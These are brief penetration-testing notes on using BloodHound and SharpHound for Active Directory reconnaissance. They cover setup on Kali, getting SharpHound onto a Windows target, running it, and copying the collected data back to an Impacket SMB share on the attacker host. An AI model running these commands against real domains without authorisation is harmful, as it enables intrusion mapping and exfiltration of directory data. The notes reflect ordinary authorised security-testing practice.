Bloodhound - AD Recon

BloodHound: Six Degrees of Domain Admin — BloodHound 3.0.3 documentation

GitHub - BloodHoundAD/SharpHoundGitHub

#Install for Kali - Attacker

sudo apt install bloodhound neo4j

#start neo4j database

sudo neo4j start

#Set password from Browser

http://localhost:7474

set account creds of 'neo4j'

Set new password when prompted

#Launch Bloodhound

./bloodhound

#Sharphound - Target

Download Sharphound (data collector) to Windows client with certutil

BloodHound/Collectors at master · BloodHoundAD/BloodHoundGitHub

#Execute sharphound.exe - Target

cmd /c sharphound.exe

#upload file back to kali and processing - Attacker

cd to Impacket\examples

sudo smbserver.py sharename /home/user/uploads

#Copy from target to attacker

copy filename.txt \\10.0.0.1\sharename

#Bloodhound data import

from within Bloodhound, far right options, import data